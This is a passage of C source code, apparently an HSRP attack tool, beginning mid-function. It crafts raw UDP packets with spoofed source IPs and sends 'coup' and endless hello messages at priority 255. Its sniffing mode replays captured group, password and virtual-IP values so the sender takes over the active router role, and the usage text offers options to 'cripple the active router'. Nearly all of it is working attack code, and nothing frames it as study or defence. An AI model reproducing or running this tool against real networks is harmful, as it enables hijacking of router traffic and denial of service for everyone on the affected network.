main.c

HSRP攻击程序源码

		heada.buf[10] = o->auth[2]; 
		heada.buf[11] = o->auth[3]; 
		heada.buf[12] = o->auth[4]; 
		heada.buf[13] = o->auth[5]; 
		heada.buf[14] = o->auth[6]; 
		heada.buf[15] = o->auth[7]; 

	}
	else{
		//default
		heada.buf[8] = 0x63;//c
		heada.buf[9] = 0x69;//i
		heada.buf[10] = 0x73;//s
		heada.buf[11] = 0x63;//c
		heada.buf[12] = 0x6f;//o
		heada.buf[13] = 0x00;//padding
		heada.buf[14] = 0x00;//padding
		heada.buf[15] = 0x00;//padding
	}
	
	heada.buf[16] = ipp[0]; //virtual ip
	heada.buf[17] = ipp[1]; //virtual ip
	heada.buf[18] = ipp[2]; //virtual ip
	heada.buf[19] = ipp[3]; //virtual ip
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = addr.s_addr; 
	 
	sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
	if(sock < 0){
		printf("socket broke\n");
		exit;
	}
	
	heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20);

	sinlen = sizeof(sin);
	if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
		printf("sendto error\n");
		exit;
	}
	close(sock);
	printf("sent coup packet....\n");
	hello();
}

//more non sniffed stuff
void hello()
{	
	int sock, sinlen, delay, on =1;
	struct sockaddr_in sin;
	unsigned char *ipp;
	struct header heada;
	ipp = (unsigned char *) &o->virtualip.s_addr;
	
	memset(&heada, '\0', sizeof(heada));
	printf("Sending hello messages, press CTRL+C when u had enough\n");
	heada.ip.ihl = 5;
	heada.ip.version = 4;
	heada.ip.tos = 0;
	heada.ip.tot_len = htons(40);
	heada.ip.frag_off = 0;
	heada.ip.ttl = 1; //may need to change
	heada.ip.protocol = IPPROTO_UDP;
	heada.ip.check = 0;
	if(o->spoofed.s_addr){
		heada.ip.saddr = o->spoofed.s_addr; //spoofed
	}
	else heada.ip.saddr = 0; //let kernal decide
	heada.ip.daddr = addr.s_addr; //but using multicast address 224.0.0.2 so?
		
	heada.udp.source = htons(1985);
	heada.udp.dest = htons(1985);
	heada.udp.len = htons(28); 
	heada.udp.check = 0; // u don't need a checksum apparently
	
	heada.buf[0] = 0x00; //version
	heada.buf[1] = 0x00; //opcode 0 = hello
	heada.buf[2] = 0x10; //state ACTIVE
	if(o->hellotime) heada.buf[3] = o->hellotime;
	else heada.buf[3] = 0x03; //hello time 3 second default
	heada.buf[4] = 0xff; //holdtime 255
	heada.buf[5] = 0xff; //priority 255
	if(o->group) heada.buf[6] = o->group;
	else heada.buf[6] = 0x01; //group
	heada.buf[7] = 0x00; //reserved
	if(*o->auth){
		heada.buf[8] = o->auth[0]; 
		heada.buf[9] = o->auth[1]; 
		heada.buf[10] = o->auth[2]; 
		heada.buf[11] = o->auth[3]; 
		heada.buf[12] = o->auth[4]; 
		heada.buf[13] = o->auth[5]; 
		heada.buf[14] = o->auth[6]; 
		heada.buf[15] = o->auth[7]; 

	}
	else{
		//default
		heada.buf[8] = 0x63; //c
		heada.buf[9] = 0x69; //i
		heada.buf[10] = 0x73; //s
		heada.buf[11] = 0x63; //c
		heada.buf[12] = 0x6f; //o
		heada.buf[13] = 0x00; //padding
		heada.buf[14] = 0x00; //padding
		heada.buf[15] = 0x00; //padding
	}
	
	heada.buf[16] = ipp[0]; //virtual ip
	heada.buf[17] = ipp[1]; //virtual ip
	heada.buf[18] = ipp[2]; //virtual ip
	heada.buf[19] = ipp[3]; //virtual ip
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = addr.s_addr; 
	 
	heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20); //sort out packet checksum

	sinlen = sizeof(sin);
	if(o->hellotime) delay = o->hellotime;
	else delay = 3;
	signal(SIGTERM, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGHUP, cleanup);
	for ( ; ; ){
		sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); //create socket
		setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)); //set socket options
		if(sock < 0){
			printf("socket broke\n");
			exit;
		}
		if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
			//send packet
			printf("sendto error\n");
			exit;
		}
		close(sock);
		printf(".");
		sleep(delay);
	}
	printf("\n");
}


//Sniffed version of coup
void sniffedcoup(struct header *headz)
{
	int sock, sinlen, on = 1;
	struct sockaddr_in sin;
	unsigned char *ipp;
	struct header heada;
	
	ipp = (unsigned char *) &o->virtualip.s_addr;
	
	memset(&heada, '\0', sizeof(heada)); //clear heada 
	printf("Sending sniffed coup command to preempt the router\n");
	heada.ip.ihl = 5;
	heada.ip.version = 4;
	heada.ip.tos = 0;
	heada.ip.tot_len = htons(40);
	heada.ip.frag_off = 0;
	heada.ip.ttl = 1; 
	heada.ip.protocol = IPPROTO_UDP;
	heada.ip.check = 0;
	if(o->spoofed.s_addr){ 
		heada.ip.saddr = o->spoofed.s_addr;
	}
	else heada.ip.saddr = 0; //let kernal decide 
	heada.ip.daddr = inet_addr("224.0.0.2"); //use multicast address 
	
	heada.udp.source = htons(1985);
	heada.udp.dest = htons(1985);
	heada.udp.len = htons(28); 
	heada.udp.check = 0; // u don't need a checksum apparently
	
	heada.buf[0] = 0x00; //version
	heada.buf[1] = 0x01; //opcode 1 = coup
	heada.buf[2] = 0x10; //state ACTIVE
	heada.buf[3] = headz->buf[3];
	heada.buf[4] = headz->buf[4]; //holdtime 255
	heada.buf[5] = 0xff; //priority 255
	heada.buf[6] = headz->buf[6]; //group
	heada.buf[7] = 0x00; //reserved
	heada.buf[8] = headz->buf[8]; //8 byte password 
	heada.buf[9] = headz->buf[9]; 
	heada.buf[10] = headz->buf[10]; 
	heada.buf[11] = headz->buf[11]; 
	heada.buf[12] = headz->buf[12]; 
	heada.buf[13] = headz->buf[13]; 
	heada.buf[14] = headz->buf[14]; 
	heada.buf[15] = headz->buf[15]; 

	heada.buf[16] = headz->buf[16]; //virtual ip
	heada.buf[17] = headz->buf[17]; //virtual ip
	heada.buf[18] = headz->buf[18]; //virtual ip
	heada.buf[19] = headz->buf[19]; //virtual ip
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = inet_addr("224.0.0.2"); 
	 
	sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
	if(sock < 0){
		printf("socket broke\n");
		exit;
	}
	
	heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20);

	sinlen = sizeof(sin);
	if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
		printf("sendto error\n");
		exit;
	}
	close(sock);
	printf("sent sniffed coup packet....\n");
	sniffedhello(headz);
}


//sniffed version of hello
void sniffedhello(struct header *headz)
{
	int sock;
	struct sockaddr_in sin;
	int sinlen;
	int on = 1; //used in setsockopt
	unsigned char *ipp;
	struct header heada;
	ipp = (unsigned char *) &o->virtualip.s_addr;
	
	memset(&heada, '\0', sizeof(heada));
	printf("Sending sniffed hello packets, press CTRL+C when u have finished\n");
	heada.ip.ihl = 5;
	heada.ip.version = 4;
	heada.ip.tos = 0;
	heada.ip.tot_len = htons(40);
	heada.ip.frag_off = 0;
	heada.ip.ttl = 1; //may need to change
	heada.ip.protocol = IPPROTO_UDP;
	heada.ip.check = 0;
	if(o->spoofed.s_addr){
		heada.ip.saddr = o->spoofed.s_addr;
	}
	else heada.ip.saddr = 0; //let kernal decide
	heada.ip.daddr = inet_addr("224.0.0.2");//use multicast address 224.0.0.2
	
	heada.udp.source = htons(1985);
	heada.udp.dest = htons(1985);
	heada.udp.len = htons(28); 
	heada.udp.check = 0; // u don't need a checksum apparently
	
	heada.buf[0] = 0x00; //version
	heada.buf[1] = 0x00; //opcode 0 = hello
	heada.buf[2] = 0x10; //state ACTIVE
	heada.buf[3] = headz->buf[3]; //hello time
	heada.buf[4] = headz->buf[4]; //holdtime 255
	heada.buf[5] = 0xff; //priority 255
	heada.buf[6] = headz->buf[6]; //group
	heada.buf[7] = 0x00; //reserved
	heada.buf[8] = headz->buf[8]; //sniffed 8byte authenticatin
	heada.buf[9] = headz->buf[9]; 
	heada.buf[10] = headz->buf[10]; 
	heada.buf[11] = headz->buf[11]; 
	heada.buf[12] = headz->buf[12]; 
	heada.buf[13] = headz->buf[13]; 
	heada.buf[14] = headz->buf[14]; 
	heada.buf[15] = headz->buf[15]; 
	
	heada.buf[16] = headz->buf[16]; //virtual ip
	heada.buf[17] = headz->buf[17]; //virtual ip
	heada.buf[18] = headz->buf[18]; //virtual ip
	heada.buf[19] = headz->buf[19]; //virtual ip
	
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1985);
	sin.sin_addr.s_addr = inet_addr("224.0.0.2"); 
	
	signal(SIGTERM, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGHUP, cleanup);
	for( ; ; ){
		
		sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
		setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
		if(sock < 0){
			printf("socket broke\n");
			exit;
		}
	
		heada.ip.check = in_chksum((unsigned short *)&heada.ip, 20);

		sinlen = sizeof(sin);
		if(sendto(sock, &heada, 48, 0, (struct sockaddr *)&sin, sinlen) != 48){
			printf("sendto error\n");
			exit;
		}
		close(sock);
		printf(".");
		sleep(headz->buf[3]); //hello time
	}
}

void cleanup(int sigio)
{
	printf("\nFinished attackin the router.....\n");
	exit(0);
}
	
//work out IP checksum
unsigned short in_chksum(unsigned short *pts, int nbytes)
{
	register long sum;
	u_short oddbyte;
	register u_short answer;

	sum = 0;
	while(nbytes > 1){
		sum += *pts++;
		nbytes -=2;
	}

	if(nbytes == 1){
		oddbyte = 0;
		*((u_char *) &oddbyte) = *(u_char *)pts;
		sum += oddbyte;
	}

	sum = (sum >> 16) + (sum &0xffff);
	sum += (sum >>16);
	answer = ~sum;
	return(answer);
}


//print usage
void usage(char *progname)
{
	printf(	"\n-S Sniff the network for all the required values then cripple the active router\n"\
		"-C Attempt to cripple the active router by sending fake packets\n"\
		"-f <spoofed IP> Send packets with spoofed source IP\n"\
		"-h <seconds> How often to send hello packets (default 3 secs)\n"\
		"-g <group> group number\n"\
		"-v <ip address> Specify virtual IP address\n"\
		"-a <Max 8 chars> Authenication string, if non specifed default used\n"\
		"-i <NIC> Specify Network Interface Card to sniff\n\n"\
		"Example: %s -C -h3 -g1 -v 123.123.123.123 -a monkey 224.0.0.2\n"\
		"Example: %s -S -i eth0 -f 1.2.3.4\n\n", progname, progname);
	exit(0);
}